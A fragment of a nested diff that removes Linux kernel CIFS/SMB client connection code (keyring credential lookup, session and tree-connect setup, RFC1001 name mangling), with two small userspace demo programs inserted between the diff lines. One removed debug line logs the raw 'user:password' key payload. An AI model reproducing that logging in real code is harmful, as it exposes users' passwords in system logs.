+-/* Populate username and pw fields from keyring if possible */
+-static int
+-cifs_set_cifscreds(struct smb3_fs_context *ctx, struct cifs_ses *ses)
+-{
+-	int rc = 0;
+-	int is_domain = 0;
+-	const char *delim, *payload;
+-	char *desc;
+-	ssize_t len;
+-	struct key *key;
+-	struct TCP_Server_Info *server = ses->server;
+-	struct sockaddr_in *sa;
+-	struct sockaddr_in6 *sa6;
+-	const struct user_key_payload *upayload;
+-
+-	desc = kmalloc(CIFSCREDS_DESC_SIZE, GFP_KERNEL);
+-	if (!desc)
+-		return -ENOMEM;
+-
+-	/* try to find an address key first */
+-	switch (server->dstaddr.ss_family) {
+-	case AF_INET:
+-		sa = (struct sockaddr_in *)&server->dstaddr;
+-		sprintf(desc, "cifs:a:%pI4", &sa->sin_addr.s_addr);
+-		break;
+-	case AF_INET6:
+-		sa6 = (struct sockaddr_in6 *)&server->dstaddr;
+-		sprintf(desc, "cifs:a:%pI6c", &sa6->sin6_addr.s6_addr);
+-		break;
+-	default:
+-		cifs_dbg(FYI, "Bad ss_family (%hu)\n",
+-			 server->dstaddr.ss_family);
+-		rc = -EINVAL;
+-		goto out_err;
+-	}
+-
+-	cifs_dbg(FYI, "%s: desc=%s\n", __func__, desc);
+-	key = request_key(&key_type_logon, desc, "");
+-	if (IS_ERR(key)) {
+-		if (!ses->domainName) {
+-			cifs_dbg(FYI, "domainName is NULL\n");
+-			rc = PTR_ERR(key);
+-			goto out_err;
+-		}
+-
+-		/* didn't work, try to find a domain key */
+-		sprintf(desc, "cifs:d:%s", ses->domainName);
+-		cifs_dbg(FYI, "%s: desc=%s\n", __func__, desc);
+-		key = request_key(&key_type_logon, desc, "");
+-		if (IS_ERR(key)) {
+-			rc = PTR_ERR(key);
+-			goto out_err;
+-		}
+-		is_domain = 1;
+-	}
+-
+-	down_read(&key->sem);
+-	upayload = user_key_payload_locked(key);
+-	if (IS_ERR_OR_NULL(upayload)) {
+-		rc = upayload ? PTR_ERR(upayload) : -EINVAL;
+-		goto out_key_put;
+-	}
+-
+-	/* find first : in payload */
+-	payload = upayload->data;
+-	delim = strnchr(payload, upayload->datalen, ':');
+-	cifs_dbg(FYI, "payload=%s\n", payload);
+-	if (!delim) {
+-		cifs_dbg(FYI, "Unable to find ':' in payload (datalen=%d)\n",
+-			 upayload->datalen);
+-		rc = -EINVAL;
+-		goto out_key_put;
+-	}
+-
+-	len = delim - payload;
+-	if (len > CIFS_MAX_USERNAME_LEN || len <= 0) {
+-		cifs_dbg(FYI, "Bad value from username search (len=%zd)\n",
+-			 len);
+-		rc = -EINVAL;
+-		goto out_key_put;
+-	}
+-
+-	ctx->username = kstrndup(payload, len, GFP_KERNEL);
+-	if (!ctx->username) {
+-		cifs_dbg(FYI, "Unable to allocate %zd bytes for username\n",
+-			 len);
+-		rc = -ENOMEM;
+-		goto out_key_put;
+-	}
+-	cifs_dbg(FYI, "%s: username=%s\n", __func__, ctx->username);
+-
+-	len = key->datalen - (len + 1);
+-	if (len > CIFS_MAX_PASSWORD_LEN || len <= 0) {
+-		cifs_dbg(FYI, "Bad len for password search (len=%zd)\n", len);
+-		rc = -EINVAL;
+-		kfree(ctx->username);
+-		ctx->username = NULL;
+-		goto out_key_put;
+-	}
+-
+-	++delim;
+-	ctx->password = kstrndup(delim, len, GFP_KERNEL);
+-	if (!ctx->password) {
+-		cifs_dbg(FYI, "Unable to allocate %zd bytes for password\n",
+-			 len);
+-		rc = -ENOMEM;
+-		kfree(ctx->username);
+-		ctx->username = NULL;
+-		goto out_key_put;
+-	}
+-
+-	/*
+-	 * If we have a domain key then we must set the domainName
+-	 * for the request.
+-	 */
+-	if (is_domain && ses->domainName) {
+-		ctx->domainname = kstrdup(ses->domainName, GFP_KERNEL);
+-		if (!ctx->domainname) {
+-			cifs_dbg(FYI, "Unable to allocate %zd bytes for domain\n",
+-				 len);
+-			rc = -ENOMEM;
+-			kfree(ctx->username);
+-			ctx->username = NULL;
+-			kfree_sensitive(ctx->password);
+-			ctx->password = NULL;
+-			goto out_key_put;
+-		}
+-	}
+-
+-	strscpy(ctx->workstation_name, ses->workstation_name, sizeof(ctx->workstation_name));
+-
+-out_key_put:
+-	up_read(&key->sem);
+-	key_put(key);
+-out_err:
+-	kfree(desc);
+-	cifs_dbg(FYI, "%s: returning %d\n", __func__, rc);
+-	return rc;
+-}
+-#else /* ! CONFIG_KEYS */
+-static inline int
+-cifs_set_cifscreds(struct smb3_fs_context *ctx __attribute__((unused)),
+-		   struct cifs_ses *ses __attribute__((unused)))
+-{
+-	return -ENOSYS;
+-}
+-#endif /* CONFIG_KEYS */
+-
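/*
 * A userspace sketch of the "user:password" split that cifs_set_cifscreds()
 * above applies to a logon key's payload: everything before the first ':'
 * is the username and the rest is the password. The payload value is
 * hypothetical; such a key could plausibly be created with something like
 * "keyctl add logon cifs:a:192.0.2.10 'alice:s3cret' @u".
 */
#include <stdio.h>
#include <string.h>

int main(void)
{
	const char payload[] = "alice:s3cret";	/* hypothetical key payload */
	const char *delim = strchr(payload, ':');

	if (!delim || delim == payload)
		return 1;	/* malformed: no separator or empty username */
	printf("user=%.*s password=%s\n",
	       (int)(delim - payload), payload, delim + 1);
	return 0;
}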
+-/**
+- * cifs_get_smb_ses - get a session matching @ctx data from @server
+- * @server: server to setup the session to
+- * @ctx: superblock configuration context to use to setup the session
+- *
+- * This function assumes it is being called from cifs_mount() where we
+- * already got a server reference (server refcount +1). See
+- * cifs_get_tcon() for refcount explanations.
+- */
+-struct cifs_ses *
+-cifs_get_smb_ses(struct TCP_Server_Info *server, struct smb3_fs_context *ctx)
+-{
+-	int rc = 0;
+-	unsigned int xid;
+-	struct cifs_ses *ses;
+-	struct sockaddr_in *addr = (struct sockaddr_in *)&server->dstaddr;
+-	struct sockaddr_in6 *addr6 = (struct sockaddr_in6 *)&server->dstaddr;
+-
+-	xid = get_xid();
+-
+-	ses = cifs_find_smb_ses(server, ctx);
+-	if (ses) {
+-		cifs_dbg(FYI, "Existing smb sess found (status=%d)\n",
+-			 ses->ses_status);
+-
+-		spin_lock(&ses->chan_lock);
+-		if (cifs_chan_needs_reconnect(ses, server)) {
+-			spin_unlock(&ses->chan_lock);
+-			cifs_dbg(FYI, "Session needs reconnect\n");
+-
+-			mutex_lock(&ses->session_mutex);
+-			rc = cifs_negotiate_protocol(xid, ses, server);
+-			if (rc) {
+-				mutex_unlock(&ses->session_mutex);
+-				/* problem -- put our ses reference */
+-				cifs_put_smb_ses(ses);
+-				free_xid(xid);
+-				return ERR_PTR(rc);
+-			}
+-
+-			rc = cifs_setup_session(xid, ses, server,
+-						ctx->local_nls);
+-			if (rc) {
+-				mutex_unlock(&ses->session_mutex);
+-				/* problem -- put our reference */
+-				cifs_put_smb_ses(ses);
+-				free_xid(xid);
+-				return ERR_PTR(rc);
+-			}
+-			mutex_unlock(&ses->session_mutex);
+-
+-			spin_lock(&ses->chan_lock);
+-		}
+-		spin_unlock(&ses->chan_lock);
+-
+-		/* existing SMB ses has a server reference already */
+-		cifs_put_tcp_session(server, 0);
+-		free_xid(xid);
+-		return ses;
+-	}
+-
+-	rc = -ENOMEM;
+-
+-	cifs_dbg(FYI, "Existing smb sess not found\n");
+-	ses = sesInfoAlloc();
+-	if (ses == NULL)
+-		goto get_ses_fail;
+-
+-	/* new SMB session uses our server ref */
+-	ses->server = server;
+-	if (server->dstaddr.ss_family == AF_INET6)
+-		sprintf(ses->ip_addr, "%pI6", &addr6->sin6_addr);
+-	else
+-		sprintf(ses->ip_addr, "%pI4", &addr->sin_addr);
+-
+-	if (ctx->username) {
+-		ses->user_name = kstrdup(ctx->username, GFP_KERNEL);
+-		if (!ses->user_name)
+-			goto get_ses_fail;
+-	}
+-
+-	/* ctx->password freed at unmount */
+-	if (ctx->password) {
+-		ses->password = kstrdup(ctx->password, GFP_KERNEL);
+-		if (!ses->password)
+-			goto get_ses_fail;
+-	}
+-	if (ctx->domainname) {
+-		ses->domainName = kstrdup(ctx->domainname, GFP_KERNEL);
+-		if (!ses->domainName)
+-			goto get_ses_fail;
+-	}
+-
+-	strscpy(ses->workstation_name, ctx->workstation_name, sizeof(ses->workstation_name));
+-
+-	if (ctx->domainauto)
+-		ses->domainAuto = ctx->domainauto;
+-	ses->cred_uid = ctx->cred_uid;
+-	ses->linux_uid = ctx->linux_uid;
+-
+-	ses->sectype = ctx->sectype;
+-	ses->sign = ctx->sign;
+-
+-	/* add server as first channel */
+-	spin_lock(&ses->chan_lock);
+-	ses->chans[0].server = server;
+-	ses->chan_count = 1;
+-	ses->chan_max = ctx->multichannel ? ctx->max_channels:1;
+-	ses->chans_need_reconnect = 1;
+-	spin_unlock(&ses->chan_lock);
+-
+-	mutex_lock(&ses->session_mutex);
+-	rc = cifs_negotiate_protocol(xid, ses, server);
+-	if (!rc)
+-		rc = cifs_setup_session(xid, ses, server, ctx->local_nls);
+-	mutex_unlock(&ses->session_mutex);
+-
+-	/* each channel uses a different signing key */
+-	spin_lock(&ses->chan_lock);
+-	memcpy(ses->chans[0].signkey, ses->smb3signingkey,
+-	       sizeof(ses->smb3signingkey));
+-	spin_unlock(&ses->chan_lock);
+-
+-	if (rc)
+-		goto get_ses_fail;
+-
+-	/*
+-	 * success, put it on the list and add it as the first channel.
+-	 * note: the session becomes active soon after this, so you'll
+-	 * need to lock before changing anything in the session.
+-	 */
+-	spin_lock(&cifs_tcp_ses_lock);
+-	list_add(&ses->smb_ses_list, &server->smb_ses_list);
+-	spin_unlock(&cifs_tcp_ses_lock);
+-
+-	cifs_setup_ipc(ses, ctx);
+-
+-	free_xid(xid);
+-
+-	return ses;
+-
+-get_ses_fail:
+-	sesInfoFree(ses);
+-	free_xid(xid);
+-	return ERR_PTR(rc);
+-}
+-
+-/* this function must be called with tc_lock held */
+-static int match_tcon(struct cifs_tcon *tcon, struct smb3_fs_context *ctx)
+-{
+-	if (tcon->status == TID_EXITING)
+-		return 0;
+-	if (strncmp(tcon->tree_name, ctx->UNC, MAX_TREE_SIZE))
+-		return 0;
+-	if (tcon->seal != ctx->seal)
+-		return 0;
+-	if (tcon->snapshot_time != ctx->snapshot_time)
+-		return 0;
+-	if (tcon->handle_timeout != ctx->handle_timeout)
+-		return 0;
+-	if (tcon->no_lease != ctx->no_lease)
+-		return 0;
+-	if (tcon->nodelete != ctx->nodelete)
+-		return 0;
+-	return 1;
+-}
+-
+-static struct cifs_tcon *
+-cifs_find_tcon(struct cifs_ses *ses, struct smb3_fs_context *ctx)
+-{
+-	struct cifs_tcon *tcon;
+-
+-	spin_lock(&cifs_tcp_ses_lock);
+-	list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+-		spin_lock(&tcon->tc_lock);
+-		if (!match_tcon(tcon, ctx)) {
+-			spin_unlock(&tcon->tc_lock);
+-			continue;
+-		}
+-		++tcon->tc_count;
+-		spin_unlock(&tcon->tc_lock);
+-		spin_unlock(&cifs_tcp_ses_lock);
+-		return tcon;
+-	}
+-	spin_unlock(&cifs_tcp_ses_lock);
+-	return NULL;
+-}
+-
+-void
+-cifs_put_tcon(struct cifs_tcon *tcon)
+-{
+-	unsigned int xid;
+-	struct cifs_ses *ses;
+-
+-	/*
+-	 * IPC tcons share the lifetime of their session and are
+-	 * destroyed in the session put function
+-	 */
+-	if (tcon == NULL || tcon->ipc)
+-		return;
+-
+-	ses = tcon->ses;
+-	cifs_dbg(FYI, "%s: tc_count=%d\n", __func__, tcon->tc_count);
+-	spin_lock(&cifs_tcp_ses_lock);
+-	spin_lock(&tcon->tc_lock);
+-	if (--tcon->tc_count > 0) {
+-		spin_unlock(&tcon->tc_lock);
+-		spin_unlock(&cifs_tcp_ses_lock);
+-		return;
+-	}
+-
+-	/* tc_count can never go negative */
+-	WARN_ON(tcon->tc_count < 0);
+-
+-	list_del_init(&tcon->tcon_list);
+-	tcon->status = TID_EXITING;
+-	spin_unlock(&tcon->tc_lock);
+-	spin_unlock(&cifs_tcp_ses_lock);
+-
+-	/* cancel polling of interfaces */
+-	cancel_delayed_work_sync(&tcon->query_interfaces);
+-
+-	if (tcon->use_witness) {
+-		int rc;
+-
+-		rc = cifs_swn_unregister(tcon);
+-		if (rc < 0) {
+-			cifs_dbg(VFS, "%s: Failed to unregister for witness notifications: %d\n",
+-					__func__, rc);
+-		}
+-	}
+-
+-	xid = get_xid();
+-	if (ses->server->ops->tree_disconnect)
+-		ses->server->ops->tree_disconnect(xid, tcon);
+-	_free_xid(xid);
+-
+-	cifs_fscache_release_super_cookie(tcon);
+-	tconInfoFree(tcon);
+-	cifs_put_smb_ses(ses);
+-}
+-
+-/**
+- * cifs_get_tcon - get a tcon matching @ctx data from @ses
+- * @ses: smb session to issue the request on
+- * @ctx: the superblock configuration context to use for building the
+- *       new tree connection
+- *
+- * - tcon refcount is the number of mount points using the tcon.
+- * - ses refcount is the number of tcon using the session.
+- *
+- * 1. This function assumes it is being called from cifs_mount() where
+- *    we already got a session reference (ses refcount +1).
+- *
+- * 2. Since we're in the context of adding a mount point, the end
+- *    result should be either:
+- *
+- * a) a new tcon already allocated with refcount=1 (1 mount point) and
+- *    its session refcount incremented (1 new tcon). This +1 was
+- *    already done in (1).
+- *
+- * b) an existing tcon with refcount+1 (add a mount point to it) and
+- *    identical ses refcount (no new tcon). Because of (1) we need to
+- *    decrement the ses refcount.
+- */
+-static struct cifs_tcon *
+-cifs_get_tcon(struct cifs_ses *ses, struct smb3_fs_context *ctx)
+-{
+-	int rc, xid;
+-	struct cifs_tcon *tcon;
+-
+-	tcon = cifs_find_tcon(ses, ctx);
+-	if (tcon) {
+-		/*
+-		 * tcon has its refcount already incremented but we need to
+-		 * decrement the extra ses reference taken by the caller (case b)
+-		 */
+-		cifs_dbg(FYI, "Found match on UNC path\n");
+-		cifs_put_smb_ses(ses);
+-		return tcon;
+-	}
+-
+-	if (!ses->server->ops->tree_connect) {
+-		rc = -ENOSYS;
+-		goto out_fail;
+-	}
+-
+-	tcon = tconInfoAlloc();
+-	if (tcon == NULL) {
+-		rc = -ENOMEM;
+-		goto out_fail;
+-	}
+-
+-	if (ctx->snapshot_time) {
+-		if (ses->server->vals->protocol_id == 0) {
+-			cifs_dbg(VFS,
+-			     "Use SMB2 or later for snapshot mount option\n");
+-			rc = -EOPNOTSUPP;
+-			goto out_fail;
+-		} else
+-			tcon->snapshot_time = ctx->snapshot_time;
+-	}
+-
+-	if (ctx->handle_timeout) {
+-		if (ses->server->vals->protocol_id == 0) {
+-			cifs_dbg(VFS,
+-			     "Use SMB2.1 or later for handle timeout option\n");
+-			rc = -EOPNOTSUPP;
+-			goto out_fail;
+-		} else
+-			tcon->handle_timeout = ctx->handle_timeout;
+-	}
+-
+-	tcon->ses = ses;
+-	if (ctx->password) {
+-		tcon->password = kstrdup(ctx->password, GFP_KERNEL);
+-		if (!tcon->password) {
+-			rc = -ENOMEM;
+-			goto out_fail;
+-		}
+-	}
+-
+-	if (ctx->seal) {
+-		if (ses->server->vals->protocol_id == 0) {
+-			cifs_dbg(VFS,
+-				 "SMB3 or later required for encryption\n");
+-			rc = -EOPNOTSUPP;
+-			goto out_fail;
+-		} else if (tcon->ses->server->capabilities &
+-					SMB2_GLOBAL_CAP_ENCRYPTION)
+-			tcon->seal = true;
+-		else {
+-			cifs_dbg(VFS, "Encryption is not supported on share\n");
+-			rc = -EOPNOTSUPP;
+-			goto out_fail;
+-		}
+-	}
+-
+-	if (ctx->linux_ext) {
+-		if (ses->server->posix_ext_supported) {
+-			tcon->posix_extensions = true;
+-			pr_warn_once("SMB3.11 POSIX Extensions are experimental\n");
+-		} else if ((ses->server->vals->protocol_id == SMB311_PROT_ID) ||
+-		    (strcmp(ses->server->vals->version_string,
+-		     SMB3ANY_VERSION_STRING) == 0) ||
+-		    (strcmp(ses->server->vals->version_string,
+-		     SMBDEFAULT_VERSION_STRING) == 0)) {
+-			cifs_dbg(VFS, "Server does not support mounting with posix SMB3.11 extensions\n");
+-			rc = -EOPNOTSUPP;
+-			goto out_fail;
+-		} else {
+-			cifs_dbg(VFS, "Check vers= mount option. SMB3.11 "
+-				"disabled but required for POSIX extensions\n");
+-			rc = -EOPNOTSUPP;
+-			goto out_fail;
+-		}
+-	}
+-
+-	xid = get_xid();
+-	rc = ses->server->ops->tree_connect(xid, ses, ctx->UNC, tcon,
+-					    ctx->local_nls);
+-	free_xid(xid);
+-	cifs_dbg(FYI, "Tcon rc = %d\n", rc);
+-	if (rc)
+-		goto out_fail;
+-
+-	tcon->use_persistent = false;
+-	/* check if SMB2 or later, CIFS does not support persistent handles */
+-	if (ctx->persistent) {
+-		if (ses->server->vals->protocol_id == 0) {
+-			cifs_dbg(VFS,
+-			     "SMB3 or later required for persistent handles\n");
+-			rc = -EOPNOTSUPP;
+-			goto out_fail;
+-		} else if (ses->server->capabilities &
+-			   SMB2_GLOBAL_CAP_PERSISTENT_HANDLES)
+-			tcon->use_persistent = true;
+-		else /* persistent handles requested but not supported */ {
+-			cifs_dbg(VFS,
+-				"Persistent handles not supported on share\n");
+-			rc = -EOPNOTSUPP;
+-			goto out_fail;
+-		}
+-	} else if ((tcon->capabilities & SMB2_SHARE_CAP_CONTINUOUS_AVAILABILITY)
+-	     && (ses->server->capabilities & SMB2_GLOBAL_CAP_PERSISTENT_HANDLES)
+-	     && (ctx->nopersistent == false)) {
+-		cifs_dbg(FYI, "enabling persistent handles\n");
+-		tcon->use_persistent = true;
+-	} else if (ctx->resilient) {
+-		if (ses->server->vals->protocol_id == 0) {
+-			cifs_dbg(VFS,
+-			     "SMB2.1 or later required for resilient handles\n");
+-			rc = -EOPNOTSUPP;
+-			goto out_fail;
+-		}
+-		tcon->use_resilient = true;
+-	}
+-
+-	tcon->use_witness = false;
+-	if (IS_ENABLED(CONFIG_CIFS_SWN_UPCALL) && ctx->witness) {
+-		if (ses->server->vals->protocol_id >= SMB30_PROT_ID) {
+-			if (tcon->capabilities & SMB2_SHARE_CAP_CLUSTER) {
+-				/*
+-				 * Set the witness-in-use flag first so that
+-				 * registration can be retried in the echo task
+-				 */
+-				tcon->use_witness = true;
+-				/* And try to register immediately */
+-				rc = cifs_swn_register(tcon);
+-				if (rc < 0) {
+-					cifs_dbg(VFS, "Failed to register for witness notifications: %d\n", rc);
+-					goto out_fail;
+-				}
+-			} else {
+-				/* TODO: try to extend for non-cluster uses (eg multichannel) */
+-				cifs_dbg(VFS, "witness requested on mount but no CLUSTER capability on share\n");
+-				rc = -EOPNOTSUPP;
+-				goto out_fail;
+-			}
+-		} else {
+-			cifs_dbg(VFS, "SMB3 or later required for witness option\n");
+-			rc = -EOPNOTSUPP;
+-			goto out_fail;
+-		}
+-	}
+-
+-	/* If the user really knows what they are doing they can override */
+-	if (tcon->share_flags & SMB2_SHAREFLAG_NO_CACHING) {
+-		if (ctx->cache_ro)
+-			cifs_dbg(VFS, "cache=ro requested on mount but NO_CACHING flag set on share\n");
+-		else if (ctx->cache_rw)
+-			cifs_dbg(VFS, "cache=singleclient requested on mount but NO_CACHING flag set on share\n");
+-	}
+-
+-	if (ctx->no_lease) {
+-		if (ses->server->vals->protocol_id == 0) {
+-			cifs_dbg(VFS,
+-				"SMB2 or later required for nolease option\n");
+-			rc = -EOPNOTSUPP;
+-			goto out_fail;
+-		} else
+-			tcon->no_lease = ctx->no_lease;
+-	}
+-
+-	/*
+-	 * We can have only one retry value for a connection to a share, so for
+-	 * resources mounted more than once to the same server share, the last
+-	 * value passed in for the retry flag is used.
+-	 */
+-	tcon->retry = ctx->retry;
+-	tcon->nocase = ctx->nocase;
+-	tcon->broken_sparse_sup = ctx->no_sparse;
+-	if (ses->server->capabilities & SMB2_GLOBAL_CAP_DIRECTORY_LEASING)
+-		tcon->nohandlecache = ctx->nohandlecache;
+-	else
+-		tcon->nohandlecache = true;
+-	tcon->nodelete = ctx->nodelete;
+-	tcon->local_lease = ctx->local_lease;
+-	INIT_LIST_HEAD(&tcon->pending_opens);
+-	tcon->status = TID_GOOD;
+-
+-	INIT_DELAYED_WORK(&tcon->query_interfaces,
+-			  smb2_query_server_interfaces);
+-	if (ses->server->dialect >= SMB30_PROT_ID &&
+-	    (ses->server->capabilities & SMB2_GLOBAL_CAP_MULTI_CHANNEL)) {
+-		/* schedule query interfaces poll */
+-		queue_delayed_work(cifsiod_wq, &tcon->query_interfaces,
+-				   (SMB_INTERFACE_POLL_INTERVAL * HZ));
+-	}
+-
+-	spin_lock(&cifs_tcp_ses_lock);
+-	list_add(&tcon->tcon_list, &ses->tcon_list);
+-	spin_unlock(&cifs_tcp_ses_lock);
+-
+-	return tcon;
+-
+-out_fail:
+-	tconInfoFree(tcon);
+-	return ERR_PTR(rc);
+-}
+-
+-void
+-cifs_put_tlink(struct tcon_link *tlink)
+-{
+-	if (!tlink || IS_ERR(tlink))
+-		return;
+-
+-	if (!atomic_dec_and_test(&tlink->tl_count) ||
+-	    test_bit(TCON_LINK_IN_TREE, &tlink->tl_flags)) {
+-		tlink->tl_time = jiffies;
+-		return;
+-	}
+-
+-	if (!IS_ERR(tlink_tcon(tlink)))
+-		cifs_put_tcon(tlink_tcon(tlink));
+-	kfree(tlink);
+-	return;
+-}
+-
+-static int
+-compare_mount_options(struct super_block *sb, struct cifs_mnt_data *mnt_data)
+-{
+-	struct cifs_sb_info *old = CIFS_SB(sb);
+-	struct cifs_sb_info *new = mnt_data->cifs_sb;
+-	unsigned int oldflags = old->mnt_cifs_flags & CIFS_MOUNT_MASK;
+-	unsigned int newflags = new->mnt_cifs_flags & CIFS_MOUNT_MASK;
+-
+-	if ((sb->s_flags & CIFS_MS_MASK) != (mnt_data->flags & CIFS_MS_MASK))
+-		return 0;
+-
+-	if (old->mnt_cifs_serverino_autodisabled)
+-		newflags &= ~CIFS_MOUNT_SERVER_INUM;
+-
+-	if (oldflags != newflags)
+-		return 0;
+-
+-	/*
+-	 * We want to share the sb only if we don't specify an r/wsize or
+-	 * the specified r/wsize is greater than or equal to the existing one.
+-	 */
+-	if (new->ctx->wsize && new->ctx->wsize < old->ctx->wsize)
+-		return 0;
+-
+-	if (new->ctx->rsize && new->ctx->rsize < old->ctx->rsize)
+-		return 0;
+-
+-	if (!uid_eq(old->ctx->linux_uid, new->ctx->linux_uid) ||
+-	    !gid_eq(old->ctx->linux_gid, new->ctx->linux_gid))
+-		return 0;
+-
+-	if (old->ctx->file_mode != new->ctx->file_mode ||
+-	    old->ctx->dir_mode != new->ctx->dir_mode)
+-		return 0;
+-
+-	if (strcmp(old->local_nls->charset, new->local_nls->charset))
+-		return 0;
+-
+-	if (old->ctx->acregmax != new->ctx->acregmax)
+-		return 0;
+-	if (old->ctx->acdirmax != new->ctx->acdirmax)
+-		return 0;
+-	if (old->ctx->closetimeo != new->ctx->closetimeo)
+-		return 0;
+-
+-	return 1;
+-}
+-
+-static int
+-match_prepath(struct super_block *sb, struct cifs_mnt_data *mnt_data)
+-{
+-	struct cifs_sb_info *old = CIFS_SB(sb);
+-	struct cifs_sb_info *new = mnt_data->cifs_sb;
+-	bool old_set = (old->mnt_cifs_flags & CIFS_MOUNT_USE_PREFIX_PATH) &&
+-		old->prepath;
+-	bool new_set = (new->mnt_cifs_flags & CIFS_MOUNT_USE_PREFIX_PATH) &&
+-		new->prepath;
+-
+-	if (old_set && new_set && !strcmp(new->prepath, old->prepath))
+-		return 1;
+-	else if (!old_set && !new_set)
+-		return 1;
+-
+-	return 0;
+-}
+-
+-int
+-cifs_match_super(struct super_block *sb, void *data)
+-{
+-	struct cifs_mnt_data *mnt_data = data;
+-	struct smb3_fs_context *ctx;
+-	struct cifs_sb_info *cifs_sb;
+-	struct TCP_Server_Info *tcp_srv;
+-	struct cifs_ses *ses;
+-	struct cifs_tcon *tcon;
+-	struct tcon_link *tlink;
+-	int rc = 0;
+-
+-	spin_lock(&cifs_tcp_ses_lock);
+-	cifs_sb = CIFS_SB(sb);
+-
+-	/* We do not want to use a superblock that has been shut down */
+-	if (CIFS_MOUNT_SHUTDOWN & cifs_sb->mnt_cifs_flags) {
+-		spin_unlock(&cifs_tcp_ses_lock);
+-		return 0;
+-	}
+-
+-	tlink = cifs_get_tlink(cifs_sb_master_tlink(cifs_sb));
+-	if (tlink == NULL) {
+-		/* cannot match the superblock if tlink was ever null */
+-		spin_unlock(&cifs_tcp_ses_lock);
+-		return 0;
+-	}
+-	tcon = tlink_tcon(tlink);
+-	ses = tcon->ses;
+-	tcp_srv = ses->server;
+-
+-	ctx = mnt_data->ctx;
+-
+-	spin_lock(&tcp_srv->srv_lock);
+-	spin_lock(&ses->ses_lock);
+-	spin_lock(&ses->chan_lock);
+-	spin_lock(&tcon->tc_lock);
+-	if (!match_server(tcp_srv, ctx) ||
+-	    !match_session(ses, ctx) ||
+-	    !match_tcon(tcon, ctx) ||
+-	    !match_prepath(sb, mnt_data)) {
+-		rc = 0;
+-		goto out;
+-	}
+-
+-	rc = compare_mount_options(sb, mnt_data);
+-out:
+-	spin_unlock(&tcon->tc_lock);
+-	spin_unlock(&ses->chan_lock);
+-	spin_unlock(&ses->ses_lock);
+-	spin_unlock(&tcp_srv->srv_lock);
+-
+-	spin_unlock(&cifs_tcp_ses_lock);
+-	cifs_put_tlink(tlink);
+-	return rc;
+-}
+-
+-#ifdef CONFIG_DEBUG_LOCK_ALLOC
+-static struct lock_class_key cifs_key[2];
+-static struct lock_class_key cifs_slock_key[2];
+-
+-static inline void
+-cifs_reclassify_socket4(struct socket *sock)
+-{
+-	struct sock *sk = sock->sk;
+-	BUG_ON(!sock_allow_reclassification(sk));
+-	sock_lock_init_class_and_name(sk, "slock-AF_INET-CIFS",
+-		&cifs_slock_key[0], "sk_lock-AF_INET-CIFS", &cifs_key[0]);
+-}
+-
+-static inline void
+-cifs_reclassify_socket6(struct socket *sock)
+-{
+-	struct sock *sk = sock->sk;
+-	BUG_ON(!sock_allow_reclassification(sk));
+-	sock_lock_init_class_and_name(sk, "slock-AF_INET6-CIFS",
+-		&cifs_slock_key[1], "sk_lock-AF_INET6-CIFS", &cifs_key[1]);
+-}
+-#else
+-static inline void
+-cifs_reclassify_socket4(struct socket *sock)
+-{
+-}
+-
+-static inline void
+-cifs_reclassify_socket6(struct socket *sock)
+-{
+-}
+-#endif
+-
+-/* See RFC1001 section 14 on representation of Netbios names */
+-static void rfc1002mangle(char *target, char *source, unsigned int length)
+-{
+-	unsigned int i, j;
+-
+-	for (i = 0, j = 0; i < (length); i++) {
+-		/* mask a nibble at a time and encode */
+-		target[j] = 'A' + (0x0F & (source[i] >> 4));
+-		target[j+1] = 'A' + (0x0F & source[i]);
+-		j += 2;
+-	}
+-
+-}
+-
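/*
 * A standalone demo of the first-level encoding that rfc1002mangle()
 * above implements (RFC 1001 section 14): every source byte expands to
 * two characters in 'A'..'P', one per nibble. Not kernel code.
 */
#include <stdio.h>

int main(void)
{
	const unsigned char name[] = "FS1";	/* arbitrary NetBIOS name */
	char out[2 * sizeof(name)];
	unsigned int i, j = 0;

	for (i = 0; i < sizeof(name) - 1; i++) {
		out[j++] = 'A' + ((name[i] >> 4) & 0x0F);
		out[j++] = 'A' + (name[i] & 0x0F);
	}
	out[j] = '\0';
	printf("%s -> %s\n", (const char *)name, out);	/* FS1 -> EGFDDB */
	return 0;
}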
+-static int
+-bind_socket(struct TCP_Server_Info *server)
+-{
+-	int rc = 0;
+-	if (server->srcaddr.ss_family != AF_UNSPEC) {
+-		/* Bind to the specified local IP address */
+-		struct socket *socket = server->ssocket;
+-		rc = socket->ops->bind(socket,
+-				       (struct sockaddr *) &server->srcaddr,
+-				       sizeof(server->srcaddr));
+-		if (rc < 0) {
+-			struct sockaddr_in *saddr4;
+-			struct sockaddr_in6 *saddr6;
+-			saddr4 = (struct sockaddr_in *)&server->srcaddr;
+-			saddr6 = (struct sockaddr_in6 *)&server->srcaddr;
+-			if (saddr6->sin6_family == AF_INET6)
+-				cifs_server_dbg(VFS, "Failed to bind to: %pI6c, error: %d\n",
+-					 &saddr6->sin6_addr, rc);
+-			else
+-				cifs_server_dbg(VFS, "Failed to bind to: %pI4, error: %d\n",
+-					 &saddr4->sin_addr.s_addr, rc);
+-		}
+-	}
+-	return rc;
+-}
+-
+-static int
+-ip_rfc1001_connect(struct TCP_Server_Info *server)
+-{
+-	int rc = 0;
+-	/*
+-	 * some servers require RFC1001 sessinit before sending
+-	 * negprot - BB check reconnection in case where second
+-	 * sessinit is sent but no second negprot
+-	 */
+-	struct rfc1002_session_packet req = {};
+-	struct smb_hdr *smb_buf = (struct smb_hdr *)&req;
+-	unsigned int len;
+-
+-	req.trailer.session_req.called_len = sizeof(req.trailer.session_req.called_name);
+-
+-	if (server->server_RFC1001_name[0] != 0)
+-		rfc1002mangle(req.trailer.session_req.called_name,
+-			      server->server_RFC1001_name,
+-			      RFC1001_NAME_LEN_WITH_NULL);
+-	else
+-		rfc1002mangle(req.trailer.session_req.called_name,
+-			      DEFAULT_CIFS_CALLED_NAME,
+-			      RFC1001_NAME_LEN_WITH_NULL);
+-
+-	req.trailer.session_req.calling_len = sizeof(req.trailer.session_req.calling_name);
+-
+-	/* calling name ends in null (byte 16) from old smb convention */
+-	if (server->workstation_RFC1001_name[0] != 0)
+-		rfc1002mangle(req.trailer.session_req.calling_name,
+-			      server->workstation_RFC1001_name,
+-			      RFC1001_NAME_LEN_WITH_NULL);
+-	else
+-		rfc1002mangle(req.trailer.session_req.calling_name,
+-			      "LINUX_CIFS_CLNT",
+-			      RFC1001_NAME_LEN_WITH_NULL);
+-
+-	/*
+-	 * As per rfc1002, @len must be the number of bytes that follow the
+-	 * length field of a rfc1002 session request payload.
+-	 */
+-	len = sizeof(req) - offsetof(struct rfc1002_session_packet, trailer.session_req);
+-
